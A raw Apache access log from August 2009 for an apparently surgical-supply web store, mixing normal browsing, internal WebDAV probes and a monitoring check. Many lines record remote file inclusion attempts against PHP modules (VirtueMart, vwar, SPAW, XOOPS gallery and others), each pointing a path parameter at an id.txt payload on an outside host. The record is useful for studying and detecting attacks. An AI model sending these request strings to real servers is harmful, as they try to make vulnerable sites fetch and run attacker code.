190.144.44.36 - - [05/Aug/2009:08:35:54 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
190.144.44.36 - - [05/Aug/2009:08:35:54 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
172.16.1.180 - - [05/Aug/2009:08:35:58 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:35:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [05/Aug/2009:08:35:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:36:08 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:36:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.69 - - [05/Aug/2009:08:36:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
59.22.140.17 - - [05/Aug/2009:08:36:11 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://btz-computerservice.de/owa/templates_c/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
59.22.140.17 - - [05/Aug/2009:08:36:11 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://btz-computerservice.de/owa/templates_c/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
59.22.140.17 - - [05/Aug/2009:08:36:11 -0400] "GET /logs/access_log.Q109070400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://btz-computerservice.de/owa/templates_c/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
172.16.1.88 - - [05/Aug/2009:08:36:40 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:36:40 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:36:40 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.159 - - [05/Aug/2009:08:36:53 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.159 - - [05/Aug/2009:08:36:53 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.159 - - [05/Aug/2009:08:36:53 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [05/Aug/2009:08:36:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [05/Aug/2009:08:37:39 -0400] "GET /logs/access_log.Q109070300%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [05/Aug/2009:08:37:39 -0400] "GET /logs/access_log.Q109051000%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [05/Aug/2009:08:38:00 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
190.144.44.36 - - [05/Aug/2009:08:38:00 -0400] "GET /logs/access_log.Q109070300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
190.144.44.36 - - [05/Aug/2009:08:38:00 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.002mag.com/oneadmin/photogallery/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
71.28.157.1 - - [05/Aug/2009:08:38:01 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:02 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:02 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:21 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062 HTTP/1.1" 200 38034 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:31 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:31 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:31 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:31 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:31 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:31 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:31 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:31 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:31 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:31 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:32 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:32 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:32 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:32 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:32 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:32 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:32 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:32 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:32 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:32 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:33 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:33 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:33 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:33 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:40 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0195FB444DF5B6002E13067+M37+ENG HTTP/1.1" 200 59159 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):900062" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:42 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195FB444DF5B6002E13067+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:42 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195FB444DF5B6002E13067+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
71.28.157.1 - - [05/Aug/2009:08:38:42 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195FB444DF5B6002E13067+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
67.15.48.60 - - [05/Aug/2009:08:39:03 -0400] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:08:39:03 -0400] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.810"
67.15.48.60 - - [05/Aug/2009:08:39:04 -0400] "GET /logs/access_log.Q109062800//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.810"
71.28.157.1 - - [05/Aug/2009:08:39:04 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0195FB4F4485A6002E73067+M37+ENG HTTP/1.1" 200 45286 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195FB444DF5B6002E13067+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
67.15.48.60 - - [05/Aug/2009:08:39:10 -0400] "GET /logs/access_log.Q109072000//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.810"
79.23.191.23 - - [05/Aug/2009:08:39:24 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:08:39:24 -0400] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:08:39:24 -0400] "GET /logs/access_log.Q109071600/index.php?_SERVER[DOCUMENT_ROOT]=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
172.16.1.168 - - [05/Aug/2009:08:39:25 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:08:39:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [05/Aug/2009:08:39:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
67.15.48.60 - - [05/Aug/2009:08:39:39 -0400] "GET /logs/access_log.Q109060200%20//convert/mvcw.php?step=1&vwar_root=http://www.solimantravel.com//micro_cms_files/images/.../id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
91.121.89.135 - - [05/Aug/2009:08:40:01 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:08:40:01 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:08:40:01 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.89.135 - - [05/Aug/2009:08:40:05 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sunwebcms.com/coppermine/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
213.171.225.234 - - [05/Aug/2009:08:40:27 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.medisite.fr/id??? HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
213.171.225.234 - - [05/Aug/2009:08:40:27 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.medisite.fr/id??? HTTP/1.1" 200 12406 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
94.23.205.32 - - [05/Aug/2009:08:40:29 -0400] "GET /logs/access_log.Q109052900//?option=com_sef&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:08:40:29 -0400] "GET //?option=com_sef&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
94.23.205.32 - - [05/Aug/2009:08:40:29 -0400] "GET /logs//?option=com_sef&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 200 12411 "-" "libwww-perl/5.803"
208.113.196.16 - - [05/Aug/2009:08:40:34 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:40:34 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:40:35 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:40:37 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:40:37 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:40:37 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
208.113.196.16 - - [05/Aug/2009:08:40:38 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
172.16.1.88 - - [05/Aug/2009:08:40:40 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:40:40 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:40:40 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
208.113.196.16 - - [05/Aug/2009:08:40:41 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.investment.kg/en/installationx/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
94.23.205.32 - - [05/Aug/2009:08:40:59 -0400] "GET /logs/access_log.Q109071900//?option=com_sef&task=view&Itemid=&mosConfig_absolute_path=http://www.wsfiz.siedlce.pl/templates/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
172.16.1.82 - - [05/Aug/2009:08:41:20 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:41:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:41:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:41:58 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:41:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:41:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.70 - - [05/Aug/2009:08:42:14 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.70 - - [05/Aug/2009:08:42:14 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.70 - - [05/Aug/2009:08:42:14 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:08:42:52 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:08:42:52 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [05/Aug/2009:08:42:52 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:42:54 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:42:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.82 - - [05/Aug/2009:08:42:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:43:05 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:43:05 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [05/Aug/2009:08:43:05 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
201.232.127.61 - - [05/Aug/2009:08:43:42 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
201.232.127.61 - - [05/Aug/2009:08:43:42 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
